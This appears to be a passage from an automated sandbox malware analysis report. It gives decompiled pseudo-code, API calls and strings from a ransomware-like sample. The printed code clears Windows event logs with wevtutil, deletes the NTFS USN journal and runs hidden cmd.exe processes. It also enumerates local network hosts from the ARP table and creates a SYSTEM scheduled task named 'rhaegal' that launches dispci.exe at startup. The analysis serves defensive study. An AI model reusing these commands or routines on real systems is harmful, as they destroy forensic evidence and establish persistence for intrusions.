htons.WS2_32(?), ref: 007B1F41
send.WS2_32(?,00000000,?,00000000), ref: 007B1FF1
recv.WS2_32(0000FFFF,?,0000FFFF,00000000), ref: 007B2008
GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,?,007B943A), ref: 007B202B
HeapFree.KERNEL32(00000000,?,?,?,?,007B943A), ref: 007B2032
GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,007B943A), ref: 007B203D
HeapFree.KERNEL32(00000000,?,?,?,?,007B943A), ref: 007B2044

Strings

?????, xrefs: 007B1FDF
Oet Uet0Xet, xrefs: 007B1EC0, 007B202B, 007B203D

Memory Dump Source

Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd

Similarity

API ID: Heap$Process$Free$AllocAllocatehtonsrecvsend
String ID: Oet Uet0Xet$?????
API String ID: 3465978623-3199473228
Opcode ID: 7dd51866f717edeb3300798925c0ab2ab981f9d79007164d6271eda69954be21
Instruction ID: fd90d9d60fbb0994e47932986b436119e0c1c1882dec85810089038403a693a0
Opcode Fuzzy Hash: 7dd51866f717edeb3300798925c0ab2ab981f9d79007164d6271eda69954be21
Instruction Fuzzy Hash: 5A5105359042469FCB218F68C858FEA7BF5EF49344B4981A5FC84EB362DB39D809C790

Uniqueness

Uniqueness Score: -1.00%

Function 007B1DD1 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 84
memorynetworkCOMMON

Download Yara Rule

C-Code - Quality: 39%

			E007B1DD1(void* __ecx, intOrPtr _a4, void** _a8) {
				char _v5;
				void* _v12;
				void* _t20;
				void* _t27;
				void* _t35;
				signed int _t38;
				void* _t47;

				_v5 = 0;
				_t20 = HeapAlloc(GetProcessHeap(), 8, 0xffff);
				_v12 = _t20;
				if(_t20 != 0) {
					_t35 = HeapAlloc(GetProcessHeap(), 8, 0x2b);
					if(_t35 != 0) {
						_t38 = 9;
						_t27 = memcpy(_t35,  *_a8, _t38 << 2);
						__imp__#9(0x27);
						 *(_t35 + 2) = _t27;
						 *((char*)(_t35 + 8)) = 0x74;
						 *((short*)(_t35 + 0x24)) = 0xff02;
						 *((char*)(_t35 + 0x26)) = 0x42;
						 *((short*)(_t35 + 0x27)) = 0x4559;
						__imp__#19(_a4, _t35, 0x2b, 0); // executed
						if(0x4559 > 0) {
							_t47 = _v12;
							__imp__#16(_a4, _t47, 0xffff, 0); // executed
							if(0x4559 > 0 &&  *((intOrPtr*)(_t47 + 9)) == 0) {
								 *((short*)( *_a8 + 0x20)) = 0;
								memset(_t47, 0, 0xffff);
								_v5 = 1;
							}
						}
						HeapFree(GetProcessHeap(), 8, _t35);
					}
					HeapFree(GetProcessHeap(), 8, _v12);
				}
				return _v5;
			}

0x007b1de5
0x007b1df2
0x007b1df4
0x007b1df9
0x007b1e09
0x007b1e0d
0x007b1e1a
0x007b1e1f
0x007b1e21
0x007b1e2f
0x007b1e38
0x007b1e3c
0x007b1e42
0x007b1e46
0x007b1e4a
0x007b1e52
0x007b1e54
0x007b1e63
0x007b1e6b
0x007b1e7d
0x007b1e81
0x007b1e89
0x007b1e89
0x007b1e6b
0x007b1e97
0x007b1e97
0x007b1ea9
0x007b1eaf
0x007b1eb6

APIs

GetProcessHeap.KERNEL32(00000008,0000FFFF,?,00000000,?,?,?,007B54D7,00000000,?,00000000,?,00000000,00000000,?,0BADF00D), ref: 007B1DE9
HeapAlloc.KERNEL32(00000000,?,?,?,007B54D7,00000000,?,00000000,?,00000000,00000000,?,0BADF00D), ref: 007B1DF2
GetProcessHeap.KERNEL32(00000008,0000002B,00000000,?,?,?,007B54D7,00000000,?,00000000,?,00000000,00000000,?,0BADF00D), ref: 007B1E04
HeapAlloc.KERNEL32(00000000,?,?,?,007B54D7,00000000,?,00000000,?,00000000,00000000,?,0BADF00D), ref: 007B1E07
htons.WS2_32(00000027), ref: 007B1E21
send.WS2_32(?,00000000,0000002B,00000000), ref: 007B1E4A
recv.WS2_32(?,?,0000FFFF,00000000), ref: 007B1E63
memset.MSVCRT ref: 007B1E81
GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,007B54D7,00000000,?,00000000,?,00000000,00000000,?,0BADF00D), ref: 007B1E90
HeapFree.KERNEL32(00000000,?,?,?,007B54D7,00000000,?,00000000,?,00000000,00000000,?,0BADF00D), ref: 007B1E97
GetProcessHeap.KERNEL32(00000008,?,?,?,?,007B54D7,00000000,?,00000000,?,00000000,00000000,?,0BADF00D), ref: 007B1EA2
HeapFree.KERNEL32(00000000,?,?,?,007B54D7,00000000,?,00000000,?,00000000,00000000,?,0BADF00D), ref: 007B1EA9

Strings

Oet Uet0Xet, xrefs: 007B1DD8, 007B1E90, 007B1EA2

Memory Dump Source

Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd

Similarity

API ID: Heap$Process$AllocFree$htonsmemsetrecvsend
String ID: Oet Uet0Xet
API String ID: 255267840-3175316637
Opcode ID: fee065a7e70844f501cb59c8fe4d5bae0ed4dbbf5af07debab110a98be8ad39c
Instruction ID: a38d941c1b5d63e1f7565c1eee127c7f6f7e7fc5334eb612cabb0ba38fb517a4
Opcode Fuzzy Hash: fee065a7e70844f501cb59c8fe4d5bae0ed4dbbf5af07debab110a98be8ad39c
Instruction Fuzzy Hash: 9B21B471600245BBEB205FA4CC4DF9A7BA8FF49300F048165F904DB291D7B8DC04C765

Uniqueness

Uniqueness Score: -1.00%

Function 007B8A6F Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 77
sleepmemoryCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E007B8A6F(void* __ecx, void* _a4) {
				void* _v0;
				void* _v12;
				intOrPtr _v16;
				void _v24;
				intOrPtr _v28;
				void* __esi;
				int _t11;
				intOrPtr _t13;
				void* _t17;
				void* _t23;
				void _t24;
				void* _t26;
				void* _t27;
				intOrPtr* _t29;
				void* _t30;
				void* _t31;

				_t27 = __ecx;
				_t30 = GetSystemMetrics;
				_t11 = GetSystemMetrics(0x2000); // executed
				_t23 = Sleep;
				while(_t11 == 0) {
					Sleep(0x1f4); // executed
					_t11 = GetSystemMetrics(0x2000);
				}
				if(SetEvent(_a4) != 0) {
					Sleep(0x3e8);
				}
				E007B8A23();
				asm("int3");
				_push(_t27);
				_push(_t27);
				_push(_t23);
				_push(_t30);
				_t31 = _v12;
				_t24 =  *_t31;
				_t13 =  *((intOrPtr*)(_t31 + 4));
				_push(0x2000);
				_v24 = _t24;
				_v28 = _t13;
				if(_t24 < _t13) {
					_t29 = __imp__#14;
					do {
						_t17 = E007BA567( *_t29(_t24)); // executed
						if(_t17 != 0) {
							__imp__#12( *_t29(_t24));
							_t26 = E007B641A(_t18);
							if(_t26 != 0) {
								E007B6B95(_t19, 0,  *((intOrPtr*)(_t31 + 8)));
								HeapFree(GetProcessHeap(), 0, _t26);
								_t31 = _v0;
							}
						}
						_t24 = _v12 + 1;
						_v12 = _t24;
					} while (_t24 < _v16);
				}
				LocalFree(_t31);
				return 0;
			}

0x007b8a6f
0x007b8a74
0x007b8a81
0x007b8a83
0x007b8a95
0x007b8a90
0x007b8a93
0x007b8a93
0x007b8aa4
0x007b8aab
0x007b8aab
0x007b8aad
0x007b8ab2
0x007b8ab6
0x007b8ab7
0x007b8ab8
0x007b8ab9
0x007b8aba
0x007b8abd
0x007b8abf
0x007b8ac2
0x007b8ac3
0x007b8ac6
0x007b8acb
0x007b8acd
0x007b8ad3
0x007b8ad7
0x007b8ade
0x007b8ae4
0x007b8af0
0x007b8af4
0x007b8afb
0x007b8b09
0x007b8b0f
0x007b8b0f
0x007b8af4
0x007b8b15
0x007b8b16
0x007b8b19
0x007b8ad3
0x007b8b1f
0x007b8b2b

APIs

GetSystemMetrics.USER32 ref: 007B8A81
Sleep.KERNELBASE(000001F4), ref: 007B8A90
GetSystemMetrics.USER32 ref: 007B8A93
SetEvent.KERNEL32(?), ref: 007B8A9C
Sleep.KERNEL32(000003E8), ref: 007B8AAB
htonl.WS2_32(74656490), ref: 007B8AD4
htonl.WS2_32(74656490), ref: 007B8AE1
inet_ntoa.WS2_32(00000000), ref: 007B8AE4
GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,?,00000000), ref: 007B8B02
HeapFree.KERNEL32(00000000,?,00000000), ref: 007B8B09
LocalFree.KERNEL32(?), ref: 007B8B1F

Strings

Oet Uet0Xet, xrefs: 007B8B02

Memory Dump Source

Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd

Similarity

API ID: FreeHeapMetricsSleepSystemhtonl$EventLocalProcessinet_ntoa
String ID: Oet Uet0Xet
API String ID: 4223591894-3175316637
Opcode ID: 3e89531e7657b09f8dc62c937cf1d0f17200dc4ecf72110b9b9e421543858e3d
Instruction ID: c4aab4b57e9a61672882a4f1442ff98d7cb548c86bffca7666a8b8dbbd41cf3d
Opcode Fuzzy Hash: 3e89531e7657b09f8dc62c937cf1d0f17200dc4ecf72110b9b9e421543858e3d
Instruction Fuzzy Hash: CF118EB1600309BBDB20AFB5CC88E9FBAACEF483407148525F501A7111EA7CED01CAA5

Uniqueness

Uniqueness Score: -1.00%

Function 007B808E Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 64
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E007B808E() {
				short _v524;
				short _v526;
				short _v2572;
				void _t22;
				void* _t30;
				signed int _t32;
				void* _t35;
				WCHAR* _t38;

				_v524 = 0;
				_t38 = L"%wswevtutil cl %ws & ";
				wsprintfW( &_v524, _t38,  &_v524, L"Setup");
				wsprintfW( &_v524, _t38,  &_v524, L"System");
				wsprintfW( &_v524, _t38,  &_v524, L"Security");
				wsprintfW( &_v524, _t38,  &_v524, L"Application");
				_t35 =  &_v524 - 2;
				do {
					_t22 =  *(_t35 + 2);
					_t35 = _t35 + 2;
				} while (_t22 != 0);
				_t32 = 0x10;
				_push( *0x7c7bc8 & 0x0000ffff);
				memcpy(_t35, L"fsutil usn deletejournal /D %c:", _t32 << 2);
				wsprintfW( &_v2572,  &_v524);
				_v526 = 0;
				_t30 = E007B7FB7( &_v2572, 3); // executed
				return _t30;
			}

0x007b80a2
0x007b80b5
0x007b80bc
0x007b80cc
0x007b80dc
0x007b80ec
0x007b80f7
0x007b80fa
0x007b80fa
0x007b80fe
0x007b8101
0x007b810f
0x007b8110
0x007b8124
0x007b8126
0x007b812d
0x007b813d
0x007b8146

APIs

wsprintfW.USER32 ref: 007B80BC
wsprintfW.USER32 ref: 007B80CC
wsprintfW.USER32 ref: 007B80DC
wsprintfW.USER32 ref: 007B80EC
wsprintfW.USER32 ref: 007B8126

Strings

Security, xrefs: 007B80CE
%wswevtutil cl %ws & , xrefs: 007B80B5, 007B80BA, 007B80CA, 007B80DA, 007B80EA
System, xrefs: 007B80BE
Setup, xrefs: 007B80A9
fsutil usn deletejournal /D %c:, xrefs: 007B811E
Application, xrefs: 007B80DE

Memory Dump Source

Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd

Similarity

API ID: wsprintf
String ID: %wswevtutil cl %ws & $Application$Security$Setup$System$fsutil usn deletejournal /D %c:
API String ID: 2111968516-1905612841
Opcode ID: a47365f2eda8eec2a2fecfc178d50168e7be4181d0a3516c274f6693734e331f
Instruction ID: 9819ebe36d80df8897be1b94331e0f3a134aa0169bddb4f24d7e4f8b3ea0164b
Opcode Fuzzy Hash: a47365f2eda8eec2a2fecfc178d50168e7be4181d0a3516c274f6693734e331f
Instruction Fuzzy Hash: BE1186A6A003286ACB60D7A48C89FE777BCEF45750F4005B5F958D3141EA78DE84CB79

Uniqueness

Uniqueness Score: -1.00%

Function 007B6E66 Relevance: 18.1, APIs: 11, Strings: 1, Instructions: 95
memoryCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E007B6E66(void* __ecx, struct _CRITICAL_SECTION* _a4, void* _a8, intOrPtr _a12) {
				intOrPtr _v8;
				void* __esi;
				void* _t46;
				void* _t51;
				void* _t54;
				void* _t56;
				signed int _t57;
				void* _t72;
				struct _CRITICAL_SECTION* _t82;

				_t67 = __ecx;
				_push(__ecx);
				_t82 = _a4;
				_v8 = 0;
				if(_t82 == 0 || _a8 == 0) {
					L11:
					return _v8;
				} else {
					EnterCriticalSection(_t82);
					_t46 = E007B6DA4(0, _t67, _t82, _a8, 0); // executed
					if(_t46 == 0) {
						_t68 =  *(_t82 + 0x20);
						if( *(_t82 + 0x24) >=  *(_t82 + 0x20)) {
							_t51 = HeapReAlloc(GetProcessHeap(), 8,  *(_t82 + 0x18), 0x3fc +  *(_t82 + 0x20) * 4);
							if(_t51 != 0) {
								 *(_t82 + 0x18) = _t51;
								 *(_t82 + 0x20) =  *(_t82 + 0x20) + 0xff;
								_v8 = E007B6E66(_t68, _t82, _a8, _a12);
							}
						} else {
							_t54 = HeapAlloc(GetProcessHeap(), 8, 8);
							 *( *(_t82 + 0x18) +  *(_t82 + 0x24) * 4) = _t54;
							if(_t54 != 0) {
								_t56 = HeapAlloc(GetProcessHeap(), 8,  *(_t82 + 0x1c));
								 *( *( *(_t82 + 0x18) +  *(_t82 + 0x24) * 4)) = _t56;
								_t57 =  *(_t82 + 0x24);
								_t72 =  *(_t82 + 0x18);
								if(_t56 == 0) {
									HeapFree(GetProcessHeap(), 0,  *(_t72 + _t57 * 4));
								} else {
									 *((intOrPtr*)( *(_t72 + _t57 * 4) + 4)) = _a12;
									memcpy( *( *( *(_t82 + 0x18) +  *(_t82 + 0x24) * 4)), _a8,  *(_t82 + 0x1c));
									 *(_t82 + 0x24) =  *(_t82 + 0x24) + 1;
									_v8 = 1;
								}
							}
						}
					}
					LeaveCriticalSection(_t82);
					goto L11;
				}
			}

0x007b6e66
0x007b6e69
0x007b6e6b
0x007b6e71
0x007b6e76
0x007b6f73
0x007b6f79
0x007b6e85
0x007b6e87
0x007b6e93
0x007b6e9a
0x007b6ea3
0x007b6ea8
0x007b6f48
0x007b6f50
0x007b6f55
0x007b6f5b
0x007b6f68
0x007b6f68
0x007b6eae
0x007b6ec1
0x007b6ec9
0x007b6ece
0x007b6edc
0x007b6ee7
0x007b6eeb
0x007b6eee
0x007b6ef1
0x007b6f29
0x007b6ef3
0x007b6ef9
0x007b6f0d
0x007b6f15
0x007b6f18
0x007b6f18
0x007b6ef1
0x007b6ece
0x007b6ea8
0x007b6f6c
0x00000000
0x007b6f72

APIs

EnterCriticalSection.KERNEL32(?,?,74655520,74654F20,?,?,007B6A84,?,?,?), ref: 007B6E87

Part of subcall function 007B6DA4: EnterCriticalSection.KERNEL32(?,00000000,?,?,?,007B6E98,?,00000000,?,?,007B6A84,?,?), ref: 007B6DB5
Part of subcall function 007B6DA4: LeaveCriticalSection.KERNEL32(?,?,?,007B6E98,?,00000000,?,?,007B6A84,?,?), ref: 007B6E0C

GetProcessHeap.KERNEL32(00000008,00000008,?,00000000,?,?,007B6A84,?,?,?), ref: 007B6EB8
HeapAlloc.KERNEL32(00000000,?,?,007B6A84,?,?,?), ref: 007B6EC1
GetProcessHeap.KERNEL32(00000008,?,?,?,007B6A84,?,?,?), ref: 007B6ED9
HeapAlloc.KERNEL32(00000000,?,?,007B6A84,?,?,?), ref: 007B6EDC
memcpy.MSVCRT ref: 007B6F0D
GetProcessHeap.KERNEL32(00000000,?,?,?,007B6A84,?,?,?), ref: 007B6F26
HeapFree.KERNEL32(00000000,?,?,007B6A84,?,?,?), ref: 007B6F29
GetProcessHeap.KERNEL32(00000008,?,?,?,00000000,?,?,007B6A84,?,?,?), ref: 007B6F41
HeapReAlloc.KERNEL32(00000000,?,?,007B6A84,?,?,?), ref: 007B6F48
LeaveCriticalSection.KERNEL32(?,?,00000000,?,?,007B6A84,?,?,?), ref: 007B6F6C

Strings

Oet Uet0Xet, xrefs: 007B6F41

Memory Dump Source

Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd

Similarity

API ID: Heap$CriticalProcessSection$Alloc$EnterLeave$Freememcpy
String ID: Oet Uet0Xet
API String ID: 1369668251-3175316637
Opcode ID: 9ef480a92535dd72b28af5bc516cec3ac2a27d6f7c61b760577f9854683be356
Instruction ID: c1a630b33e5efc5bf322cdb84d19aa0f4f58b31c5a9fd5892902aeab2ae1376d
Opcode Fuzzy Hash: 9ef480a92535dd72b28af5bc516cec3ac2a27d6f7c61b760577f9854683be356
Instruction Fuzzy Hash: 47315C71600A05EFCB219FA9DC44EAAB7F6FF88304B108618FA4687651DB39E911CF54

Uniqueness

Uniqueness Score: -1.00%

Function 007B742C Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 90
memoryCOMMON

Download Yara Rule

C-Code - Quality: 25%

			E007B742C(intOrPtr _a4) {
				long _v8;
				long _v12;
				void* _v16;
				long _v20;
				intOrPtr _v24;
				short _v88;
				void* __esi;
				void* _t24;
				void* _t29;
				void* _t33;
				void* _t44;
				signed char* _t46;
				long _t49;
				intOrPtr* _t51;
				void* _t54;

				_t51 = __imp__GetIpNetTable;
				_t49 = 0;
				_v20 = 0;
				_v8 = 0;
				_t24 =  *_t51(0,  &_v8, 0); // executed
				if(_t24 != 0xe8) {
					if(_t24 != 0x7a) {
						L15:
						return _v20;
					}
					_t44 = HeapAlloc(GetProcessHeap(), 0, _v8);
					_v16 = _t44;
					if(_t44 == 0) {
						L14:
						goto L15;
					}
					_t29 =  *_t51(_t44,  &_v8, 0); // executed
					if(_t29 != 0) {
						L13:
						HeapFree(GetProcessHeap(), _t49, _t44);
						goto L14;
					}
					_v20 = 1;
					_v12 = 0;
					if( *_t44 <= 0) {
						goto L13;
					}
					_v24 = 3;
					_t46 = _t44 + 0x16;
					do {
						_push(4);
						asm("repe cmpsb");
						if(0 != 0) {
							asm("sbb eax, eax");
							asm("sbb eax, 0xffffffff");
						}
						if(0 == 0) {
							wsprintfW( &_v88, L"%u.%u.%u.%u",  *(_t46 - 2) & 0x000000ff,  *(_t46 - 1) & 0x000000ff,  *_t46 & 0x000000ff, _t46[1] & 0x000000ff);
							_t54 = _t54 + 0x18;
							E007B6B95( &_v88, 0, _a4);
						}
						_v12 = _v12 + 1;
						_t33 = _v16;
						_t46 =  &(_t46[0x18]);
					} while (_v12 <  *_t33);
					_t44 = _t33;
					_t49 = 0;
					goto L13;
				}
				return 0;
			}

0x007b7433
0x007b743a
0x007b7442
0x007b7445
0x007b7448
0x007b744f
0x007b745b
0x007b7512
0x00000000
0x007b7512
0x007b7473
0x007b7475
0x007b747a
0x007b7511
0x00000000
0x007b7511
0x007b7486
0x007b748a
0x007b7502
0x007b750b
0x00000000
0x007b750b
0x007b748c
0x007b7493
0x007b7498
0x00000000
0x00000000
0x007b749a
0x007b74a1
0x007b74a4
0x007b74a4
0x007b74af
0x007b74b1
0x007b74b3
0x007b74b5
0x007b74b5
0x007b74ba
0x007b74d8
0x007b74de
0x007b74e9
0x007b74e9
0x007b74ee
0x007b74f1
0x007b74f7
0x007b74fa
0x007b74fe
0x007b7500
0x00000000
0x007b7500
0x00000000

APIs

GetIpNetTable.IPHLPAPI(00000000,?,00000000), ref: 007B7448
GetProcessHeap.KERNEL32(00000000,?,00000000), ref: 007B7466
HeapAlloc.KERNEL32(00000000), ref: 007B746D
GetIpNetTable.IPHLPAPI(00000000,?,00000000), ref: 007B7486
wsprintfW.USER32 ref: 007B74D8
GetProcessHeap.KERNEL32(00000000,00000000), ref: 007B7504
HeapFree.KERNEL32(00000000), ref: 007B750B

Strings

%u.%u.%u.%u, xrefs: 007B74D2
Oet Uet0Xet, xrefs: 007B7466, 007B7504

Memory Dump Source

Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd

Similarity

API ID: Heap$ProcessTable$AllocFreewsprintf
String ID: Oet Uet0Xet$%u.%u.%u.%u
API String ID: 2259129056-2591814563
Opcode ID: 463304b040997963d147ee4d5bc4cb42400cfca7ffca7fbd34b80c5f917247ad
Instruction ID: 2a3a4d441e02ca4c6240f9a2d2e69b0d03f8912957c02186cde612cc20edf5f3
Opcode Fuzzy Hash: 463304b040997963d147ee4d5bc4cb42400cfca7ffca7fbd34b80c5f917247ad
Instruction Fuzzy Hash: FB319EB2900159ABCF218FA8CD84EFEBBBCFF89305F144556E901E6141E63C9A05DB60

Uniqueness

Uniqueness Score: -1.00%

Function 007B7FB7 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 80
sleepprocessstringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E007B7FB7(intOrPtr _a4, signed int _a8) {
				struct _PROCESS_INFORMATION _v20;
				struct _STARTUPINFOW _v88;
				short _v1648;
				short _v1650;
				short _v3696;
				char* _t20;
				char* _t21;
				int _t26;
				void* _t35;
				long _t36;
				long _t37;
				int _t38;

				_t38 = 0;
				wsprintfW( &_v3696, L"/c %ws", _a4);
				_v1650 = 0;
				if(GetEnvironmentVariableW(L"ComSpec",  &_v1648, 0x30c) != 0 || GetSystemDirectoryW( &_v1648, 0x30c) != 0 && lstrcatW( &_v1648, L"\\cmd.exe") != 0) {
					_t35 = 0x10;
					_t20 =  &_v20;
					do {
						 *_t20 = 0;
						_t20 = _t20 + 1;
						_t35 = _t35 - 1;
					} while (_t35 != 0);
					_t36 = 0x44;
					_t37 = _t36;
					_t21 =  &_v88;
					do {
						 *_t21 = 0;
						_t21 = _t21 + 1;
						_t37 = _t37 - 1;
					} while (_t37 != 0);
					_v88.cb = _t36;
					_t26 = CreateProcessW( &_v1648,  &_v3696, 0, 0, 0, 0x8000000, 0, 0,  &_v88,  &_v20); // executed
					_t38 = _t26;
					if(_t38 != 0) {
						Sleep(_a8 * 0x3e8); // executed
					}
					goto L9;
				} else {
					L9:
					return _t38;
				}
			}

0x007b7fd4
0x007b7fd6
0x007b7fe1
0x007b8002
0x007b802e
0x007b802f
0x007b8032
0x007b8032
0x007b8034
0x007b8035
0x007b8035
0x007b803a
0x007b803b
0x007b803d
0x007b8040
0x007b8040
0x007b8042
0x007b8043
0x007b8043
0x007b8066
0x007b8069
0x007b806f
0x007b8073
0x007b807f
0x007b807f
0x00000000
0x007b8085
0x007b8085
0x007b808b
0x007b808b

APIs

wsprintfW.USER32 ref: 007B7FD6
GetEnvironmentVariableW.KERNEL32(ComSpec,?,0000030C), ref: 007B7FFA
GetSystemDirectoryW.KERNEL32(?,0000030C), ref: 007B800C
lstrcatW.KERNEL32(?,\cmd.exe), ref: 007B8022
CreateProcessW.KERNELBASE(?,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 007B8069
Sleep.KERNELBASE(00000000), ref: 007B807F

Strings

\cmd.exe, xrefs: 007B8016
ComSpec, xrefs: 007B7FF5
/c %ws, xrefs: 007B7FCC

Memory Dump Source

Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd

Similarity

API ID: CreateDirectoryEnvironmentProcessSleepSystemVariablelstrcatwsprintf
String ID: /c %ws$ComSpec$\cmd.exe
API String ID: 1518394870-1564754240
Opcode ID: c7f842ffd8e5a92ec06481a24383b36b23d47aaa903a6aed69c7c3c8a050c076
Instruction ID: e655dac9bccb08abd64dc6ed4d1758cad942a301d8f74bb6d23fc6f569059140
Opcode Fuzzy Hash: c7f842ffd8e5a92ec06481a24383b36b23d47aaa903a6aed69c7c3c8a050c076
Instruction Fuzzy Hash: 7321A4B260014DAFDB20EBA4DC88FEB77ADEB94341F048566F545E6140FA39CE48CB61

Uniqueness

Uniqueness Score: -1.00%

Function 007B1000 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 52
sleepstringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E007B1000(void* __eflags, intOrPtr _a4) {
				short _v524;
				short _v1564;
				void* _t8;
				signed int _t15;
				signed int _t21;

				_t21 = 0;
				_t8 = E007B7FB7(L"schtasks /Delete /F /TN rhaegal", 0); // executed
				if(_t8 != 0) {
					Sleep(0x7d0); // executed
				}
				if(GetEnvironmentVariableW(L"ComSpec",  &_v524, 0x104) != 0 || GetSystemDirectoryW( &_v524, 0x104) != 0 && lstrcatW( &_v524, L"\\cmd.exe") != 0) {
					wsprintfW( &_v1564, L"schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR \"%ws /C Start \\\"\\\" \\\"%wsdispci.exe\\\" -id %u && exit\"",  &_v524, _a4,  *0x7c7bbc);
					_t15 = E007B7FB7( &_v1564, _t21); // executed
					_t21 = _t15;
				}
				return _t21;
			}

0x007b100b
0x007b1013
0x007b101a
0x007b1021
0x007b1021
0x007b1041
0x007b1087
0x007b1098
0x007b109d
0x007b109d
0x007b10a4

APIs

Part of subcall function 007B7FB7: wsprintfW.USER32 ref: 007B7FD6
Part of subcall function 007B7FB7: GetEnvironmentVariableW.KERNEL32(ComSpec,?,0000030C), ref: 007B7FFA
Part of subcall function 007B7FB7: GetSystemDirectoryW.KERNEL32(?,0000030C), ref: 007B800C
Part of subcall function 007B7FB7: lstrcatW.KERNEL32(?,\cmd.exe), ref: 007B8022
Part of subcall function 007B7FB7: CreateProcessW.KERNELBASE(?,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 007B8069
Part of subcall function 007B7FB7: Sleep.KERNELBASE(00000000), ref: 007B807F

Sleep.KERNELBASE(000007D0,schtasks /Delete /F /TN rhaegal,00000000,?,00000000), ref: 007B1021
GetEnvironmentVariableW.KERNEL32(ComSpec,?,00000104,schtasks /Delete /F /TN rhaegal,00000000,?,00000000), ref: 007B1039
GetSystemDirectoryW.KERNEL32(?,00000104), ref: 007B104B
lstrcatW.KERNEL32(?,\cmd.exe), ref: 007B1061
wsprintfW.USER32 ref: 007B1087

Strings

\cmd.exe, xrefs: 007B1055
schtasks /Delete /F /TN rhaegal, xrefs: 007B100E
ComSpec, xrefs: 007B1034
schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "%ws /C Start \"\" \"%wsdispci.exe\" -id %u && exit", xrefs: 007B1081

Memory Dump Source

Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

